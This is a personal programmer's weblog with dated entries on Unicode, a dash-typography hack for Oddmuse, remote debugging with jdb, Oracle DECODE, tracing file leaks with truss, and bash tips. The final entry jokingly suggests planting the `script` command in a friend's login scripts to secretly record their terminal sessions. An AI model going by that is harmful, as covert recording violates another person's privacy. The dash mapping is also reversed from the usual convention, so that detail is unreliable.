I did a small presentation on the subject of internationalization (zipped powerpoint). Definitions, Unicode, the ISO-8859 alphabet soup, the Windows encodings and more are touched upon. The presentation itself is light on details, but the comments tell you more. I plan on doing a second part in the future. Stay tuned.

After I did the presentation, a colleague pointed me to a recent java.net weblog entry: changes in the Unicode support in J2SE 1.5. Worth a read, whether you're a Java programmer or not.

2005-04-03

Today I put a small hack in the single script that makes up Oddmuse, the software this site runs on. It had been on my TODO list for some weeks.

  [bart@room wiki]$ diff wiki.cgi wiki_old.cgi
  454,456d453
  <   $text =~ s/\-\-\-/&#8211;/g;
  <   $text =~ s/\-\-/&#8212;/g;
  <   $text =~ s/\\\-/-/g;
  [bart@room wiki]$

A hyphen with a backslash in front of it becomes a literal hyphen. Two hyphens become an em-dash. Three hyphens become an en-dash. All as per this article. And the best thing is, this was all done in under 15 minutes, including skimming the article and adding this weblog entry.

There are loads of typographical things bothering me, one of them being the em- and en-dash (now fixed), but other things like curly quotes, ellipses and ligatures are still missing. I'd like a nice fi and an ij ligature, for starters. And those can't be done the way it's done above: you only want them in the output, not to have your input changed.

Note that all of this was solved long ago in TeX and friends, and still we have to do without it on the Web and in "professional" word processing packages that have reached version "XP" or "2.0" and still don't look so good.

2005-03-22

When you have the time, look around at C2. It's one of the oldest wikis around, and a vast collection of interesting stuff; for instance, the other day I was looking for implementations of access control lists (ACLs) and voilà, C2 delivers.

One of the people behind this wiki is Ward Cunningham. At Artima, Bill Venners did an interview with Ward Cunningham.

2005-03-21

Chet Haase blogs about how they are looking for Java applications which they want to improve on either the UI or the performance side:
http://weblogs.java.net/blog/chet/archive/2005/03/jdg_seeks_bad_c.html

It's Sun, so they probably don't want SWT applications, which leaves out Azureus. However, there must be other apps out there and I for one am going to look around. The deadline is March 31st.

You can also do this yourself, of course. Personally, I'm not very interested in the UI side, more in the performance side. If you haven't ever used a profiler, I'd say: pick an application you think needs some performance improvement, download a profiler and run it on that application. One profiler I can recommend is JProfiler. It has a 14-day trial, but that's no problem since it passed my 15_minute_test with flying colors. I've also seen people put the built-in profiler of Eclipse to good use.

2005-01-21

Outside work I received a question: "We need a WebDAV implementation which is complete, has admin screens and is also reachable with FTP". Two solutions were found: a heavily hacked Apache, and Oracle IFS. The problem with the former is that you, well, need to hack. The problem with the latter is that you need an experienced DBA who can administer the midtier.

Then there's an additional thing that needs attention. If you want to customize IFS, you'll need to look into its API, the CM SDK (Content Management Software Development Kit). That API is basically split into two parts: one part for the quick-and-easy tasks of copying, deleting, moving, etc., and a second part which goes deeper and with which you can really modify the workings of IFS. It makes the API really baroque, but also really powerful. I've used the CM SDK, but only for quite simple tasks: reading, writing and deleting files and folders. Looking at the baroque API, something occurred to me: who'd need more? It's a filesystem in the database. You can completely modify it. Great, but you probably do not need this.

However, while you don't necessarily need the baroque part of the interface, it's there alongside its simpler counterpart. And besides that, the whole product is pretty unique. I don't know of any other offering that has so many interfaces to file sharing mechanisms (FTP, WebDAV, NFS, SMB/CIFS, et cetera) and can be combined with your database-driven applications.

As with many things, there are both advantages and disadvantages and before choosing, it's a good thing to be knowledgeable on both.

2005-01-18

As an addition to the previous post: issue tracking is of course just one facet of a whole project. Now, I'm not yet an expert on this, but Asa of Mozilla fame definitely is. Check this weblog entry for a highly interesting post on the subject: http://weblogs.mozillazine.org/asa/archives/007309.html

2005-01-17

Looking back, I miss a lot of things that should've been in the curriculum of my education. I've said something about reading source code, but what most computer science students also miss is a feel for how difficult it is to manage the software engineering of big projects. In my opinion, every student should have a look at the issue system of a big project. I had some irritations in using OpenOffice and decided to see what the problem was with the bug I was experiencing. Take a look at Tracking Issues.

2004-12-12

Reading source code is one of those things that I feel nobody likes, even though the advantages are so clear. You can brush up language skills, find out how other people solve things, learn different architectures, find out what the quality of a code base is, play spot-the-pattern, et cetera. One cause could be that you don't learn to read other people's code in college. On the contrary, they want you to create little pieces of code that can easily be kept in one head and where correctness is easily demonstrated.

The real world doesn't work like that. If your day job isn't maintaining other people's code in the first place, then you'll get to see your colleagues' code at the end of the project, when they move on and you stay behind for a little while. Either way, you'll just have to accept that you won't understand everything, and get on with it. For those who still have that barrier, I did a little writing on how to search through code and get it to work the way you want, without feeling lost. We're going to look at Adjusting Starfighter.

2004-10-15

How to remotely debug using jdb

First compile your Java code with the '-g' option. Deploy the compiled code to your server. Then start the virtual machine on the server with debugging parameters:

 -Xdebug -Xrunjdwp:transport=dt_socket,address=6000,server=y,suspend=n
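
For example, a complete launch line might look like this (the application jar is hypothetical):

  java -Xdebug -Xrunjdwp:transport=dt_socket,address=6000,server=y,suspend=n -jar myapp.jar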

Then either use JDeveloper or the standard (reference implementation) debugger from Sun, which is called 'jdb'. In the first case, go to Tools, Project Properties, flip open Debugger, click Remote and check Remote Debugging. Select 'Attach to JPDA', which means we attach to a Sun JVM. Then click OK and click the debug icon. Fill in the hostname and the address which you specified in the debugging parameters, for example 'oxdaps20a' and '6000'.

To debug with jdb, open a shell or DOS box and type:

  jdb -attach your.development.box:6000

At the jdb prompt, type the line

  use /path/to/sourcefiles

to tell the debugger where it can find the source files. Set some breakpoints with the 'stop' command and then wait for the breakpoints to hit. Type 'list' to see where the flow of control is when a breakpoint was encountered. Type 'next' to go to the next line. Type 'step' to step into a method.
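
For example (class and method names hypothetical):

  stop at com.mycompany.MyServlet:42
  stop in com.mycompany.MyServlet.doGet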

Note: when either debugger acts funny (breakpoints are set but never hit, breakpoints cannot be set, or the code stops in places where it shouldn't stop, such as empty lines or comments), chances are that the code that's running differs from what you are looking at. Compile and deploy your code again and start debugging anew. When the JDeveloper debugger acts funny, use jdb instead. The JDeveloper debugger is more tuned to the Oracle JVM (OJVM), which incidentally is now also available on Linux.

Note: when you hit a breakpoint, all threads in the virtual machine halt, affecting other people's work. With jdb it's possible to let the other threads continue; see 'help thread'. With JDeveloper this is not possible (and I've heard that there aren't any other commercial debuggers that can do this either).

Note 2: if you want the virtual machine to wait until you've connected remotely with the debugger, change the VM option 'suspend' to 'y'.

2004-09-02

Would you like a nice way to order the output of (Oracle) SQL in an arbitrary way? For instance, if you query a table of filenames and the customer first wants the files with extension xml, then pdf and finally raw, you could use a query like the one below:

      select ast.filename,
             decode(ast.extension,
                    'pdf', 1,
                    'raw', 2,
                    0)                 sort_order
      from   assets                    ast
      order  by sort_order
      

The syntax of decode is a bit confusing. Basically, it's like a Java switch statement. First you name the column whose value you want to substitute. Then come the original/new value pairs. The final parameter is the default, for when none of the original values match. In the example above, 'pdf' maps to 1, 'raw' maps to 2, and everything else (including 'xml') falls through to the default 0, so the xml files sort first.

2004-08-06

This is for unredeemed hackers who must see the raw bits to be happy.
-- Solaris truss man page

They say that automatic garbage collection is one of the advantages of Java. That doesn't quite get you off the hook completely. True, it saves you from having to delete each new object you create, as one would in C++. However, besides memory there are other scarce resources (disk space, network connections, database handles), and those aren't cleaned up automatically, unlike the objects that represent them. For instance, below is a routine which reads a text file into a string:

    private String readFile(File file) throws IOException {
        BufferedReader in = null;
        try {
            String line = null;
            StringBuffer contents = new StringBuffer();
            in = new BufferedReader(new FileReader(file));
    
            while ((line = in.readLine()) != null) {
                contents = contents.append(line + "\n");
            }
            return contents.toString();
        } catch (Exception e) {
            return null;
        }
    }

Have you spotted the error? I was in a hurry when I coded this method and I certainly didn't. The error is that the reader needs to be closed:

        finally {
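            // always executed, even after a return or an exception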
            if (in != null) {
                in.close();
            }
        }

This method isn't heavily used, but when the maximum is 1024 open files and the application runs for a few hours, you'll get messages in your logs saying "Too many open files". (By the way, the maximum can be found with ulimit -n if you're using the Bash shell.) What's nasty is that the message doesn't tell you exactly where you open too many files. Rather than poring over all that code, I used truss on the Solaris box (on Linux, the equivalent is strace). This command can tell you which system calls an application makes.

System calls are basically the commands that you can give to the kernel. Your favourite programming language may have nice libraries or even some drag-and-drop widgets, but it all comes down to asking the kernel whether you can open that file. The kernel then does the work of checking permissions, checking whether the file is actually there, returning an error if necessary, et cetera. Examples of system calls are open and fork.

As said before, truss and strace can tell us which system calls an application makes. I was interested in the open and close calls. After I had done a ps to find the process ID (pid) of the running app, I typed

    truss -t open,close -p 7601 -f > trussoutput.txt 2>&1
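
On Linux, the roughly equivalent strace invocation would be (same hypothetical pid):

  strace -f -e trace=open,close -p 7601 -o straceoutput.txt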

When the application had run for some time, I interrupted truss, opened the output in vi and threw away all matching pairs of open and close calls. What remained were the open calls without a counterpart. Since the arguments to the system calls are also shown, the filename shows up. And that definitely rang a bell: I knew immediately which piece of code opened that file.

2004-07-31

I'm currently reading The Pragmatic Programmer and although it contains a lot of those things that are pretty much common sense, there are some true gems in there as well. Especially the part about tracer bullets.

The project I'm currently working on consists of a number of workflows. One of the flows I'm working on has to support different production stages; explaining them would go too far here, but suffice it to say that there are multiple stages, of which the first is the simplest.

Some of those workflows contained steps that were unexpectedly large and had changing requirements, meaning they were difficult to plan. Estimates would change all the time, causing some *cough* friction here and there.

As a remedy, we would first get the full flow working for the first production stage, and when the flow ran flawlessly from start to end, we would build out each step in the flow to support the next stage.

Hunt and Thomas (the Pragmatic Programmers) call this tracer bullets: rounds with a phosphor payload that flashes when it hits the target, so that in the dark, the gunner knows his aim is right.

The idea is good, but it's immensely difficult to resist the temptation when you're frantically coding! Because you're in the Flow, and when you've done one part of the functionality, you can see the next methods and data structures dangling in front of you. Still, you should break out of the flow at the right time, synchronize with your team members and the QA people, and get that workflow to, well, flow.

It's amazing what this does to management, the customer and the developer. When the flow works partly, it gives a feeling of confidence to all the parties. This is definitely a good thing.

2004-07-13

Some cool bash/Linux stuff:

If you're using bash, put the line TMOUT=600 in /root/.bashrc. An idle root shell will then automatically log out after 10 minutes.

If you're often cd'ing into a mounted directory, that can mean a lot of typing. For instance, at a client I always have to change to the directory /mnt/es-groups/EWII for the project files. To save typing, I put the following line in my .bash_profile:

export CDPATH=".:/mnt/es-groups/EWII"

When you type cd Documents, you'll find yourself immediately in the project's documentation directory; bash even tab-completes.
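
For example:

  $ export CDPATH=".:/mnt/es-groups/EWII"
  $ cd Documents
  /mnt/es-groups/EWII/Documents

(When cd resolves a directory through CDPATH, bash prints the full path, as shown.)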

UNIX Commands No One Ever Heard Of ™...: Type script and press Enter. A new shell will be started. Now do whatever you like. When you're done, press CTRL-D on an empty prompt. script will reply with something like Script done, file is typescript. The new file will contain whatever you've typed, including screen output! Fun to put in a friend's login scripts....